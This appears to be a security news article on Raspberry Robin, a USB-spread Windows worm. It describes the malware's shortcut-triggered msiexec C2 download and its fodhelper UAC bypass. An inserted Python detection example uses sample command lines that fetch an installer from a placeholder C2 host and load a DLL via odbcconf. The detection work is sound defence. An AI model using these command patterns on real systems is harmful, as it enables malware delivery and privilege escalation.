A computer worm spreads using USB drives

Analysts have discovered new Windows malware that spreads using external USB drives.

Cybersecurity researchers have discovered new Windows malware with worm-like capabilities that spreads through removable USB devices.

The malware was identified by Red Canary’s detection engineering team, which first observed it in September 2021 in the networks of several customers, including some in the technology and manufacturing sectors. Red Canary tracks the associated cluster of malicious activity under the name Raspberry Robin.

Operating mode

The worm spreads to a new Windows system when an infected USB drive carrying a malicious file is connected. The payload sits on the drive and is presented as a .LNK shortcut file that points to a legitimate folder. Once the drive is connected, the malware spawns a new process: cmd.exe is used to launch a malicious file stored on the infected drive.

cmd.exe then launches explorer.exe and Microsoft Standard Installer (msiexec.exe). The latter is used to reach a malicious domain on the external network for command and control (C2) and to download and install a malicious DLL. In short, Raspberry Robin abuses a legitimate, signed Windows binary (msiexec.exe) for its outbound communication with the malicious domain.

“While msiexec.exe downloads and executes legitimate installer packages, adversaries also exploit it to deliver malware”, the researchers said. The malicious DLL is then loaded and executed through a chain of legitimate Windows utilities: fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe. Because fodhelper.exe is a Windows binary that runs elevated without prompting the user, this chain bypasses User Account Control (UAC).
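The execution chain above is what a detection engineer would key on: cmd.exe launching a file from a removable drive, msiexec.exe being handed a URL instead of a local package, and fodhelper.exe spawning rundll32.exe or odbcconf.exe. The following is an added example, not code from Red Canary or from the article, that runs three such rules over constructed Sysmon-style process-creation records. The drive letters, process IDs, command lines and the placeholder domain are assumptions built for the example, not indicators taken from the report.

```python
"""Added example: detection rules for the Raspberry Robin execution chain,
run over constructed process-creation events (not real telemetry)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_pid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged by the EDR / Sysmon


# Assumption: drive letters assigned to removable media in this environment.
REMOVABLE_DRIVES = {"E:", "F:"}


def basename(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_cmd_from_removable(ev: ProcEvent) -> bool:
    """cmd.exe whose command line references a file on a removable drive."""
    if basename(ev.image) != "cmd.exe":
        return False
    # Any drive-letter path in the command line, e.g. E:\folder\file
    for m in re.finditer(r"\b([A-Za-z]:)\\", ev.cmdline):
        if m.group(1).upper() in REMOVABLE_DRIVES:
            return True
    return False


def rule_msiexec_url(ev: ProcEvent) -> bool:
    """msiexec.exe given a remote package URL rather than a local .msi path."""
    return (basename(ev.image) == "msiexec.exe"
            and re.search(r"https?://", ev.cmdline, re.I) is not None)


def rule_uac_bypass_chain(ev: ProcEvent, by_pid: dict) -> bool:
    """fodhelper.exe -> rundll32.exe/odbcconf.exe, or rundll32.exe -> odbcconf.exe."""
    parent = by_pid.get(ev.parent_pid)
    if parent is None:
        return False
    child, par = basename(ev.image), basename(parent.image)
    if par == "fodhelper.exe" and child in {"rundll32.exe", "odbcconf.exe"}:
        return True
    return par == "rundll32.exe" and child == "odbcconf.exe"


def detect(events) -> list:
    """Return (rule_name, pid) for every event that trips a rule, in event order."""
    by_pid = {ev.pid: ev for ev in events}
    hits = []
    for ev in events:
        if rule_cmd_from_removable(ev):
            hits.append(("cmd_from_removable_drive", ev.pid))
        if rule_msiexec_url(ev):
            hits.append(("msiexec_remote_package", ev.pid))
        if rule_uac_bypass_chain(ev, by_pid):
            hits.append(("fodhelper_uac_bypass_chain", ev.pid))
    return hits


# Constructed sample events. PIDs, paths and the .invalid domain are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # shortcut on the USB drive hands cmd.exe a file that lives on the drive
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /R E:\Documents\update.bat"),
    # msiexec.exe pulling a package from a remote host instead of a local path
    ProcEvent(300, 200, r"C:\Windows\System32\msiexec.exe",
              'msiexec.exe /Q /I "http://c2.example.invalid/pkg.msi"'),
    # auto-elevating fodhelper.exe spawning the DLL-loading utilities
    ProcEvent(400, 200, r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(600, 500, r"C:\Windows\System32\odbcconf.exe", r"odbcconf.exe /a {REGSVR C:\ProgramData\x.dll}"),
    # benign look-alikes that must not fire
    ProcEvent(700, 100, r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Users\alice\Downloads\tool.msi"),
    ProcEvent(800, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir C:\Users"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The rules deliberately stay at the level of the behaviours the report names (removable-drive source, remote package for msiexec.exe, the fodhelper.exe parent/child relationship) rather than file hashes or domains, since those change between campaigns; a real deployment would populate REMOVABLE_DRIVES from device-arrival events rather than a fixed set.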

Gray area

The researchers have not answered every question. “First, we don’t know how or where Raspberry Robin infects external drives to perpetuate its business,” they explain, adding, “but it’s likely to be happening offline or out of our view.” They also do not know why Raspberry Robin installs a malicious DLL.

“One hypothesis is that this may be an attempt to establish persistence on an infected system, although additional information is needed to establish confidence in this hypothesis.”

Finally, there is no information about what the final stage of the malware does, and the objective of the Raspberry Robin operators remains unknown.
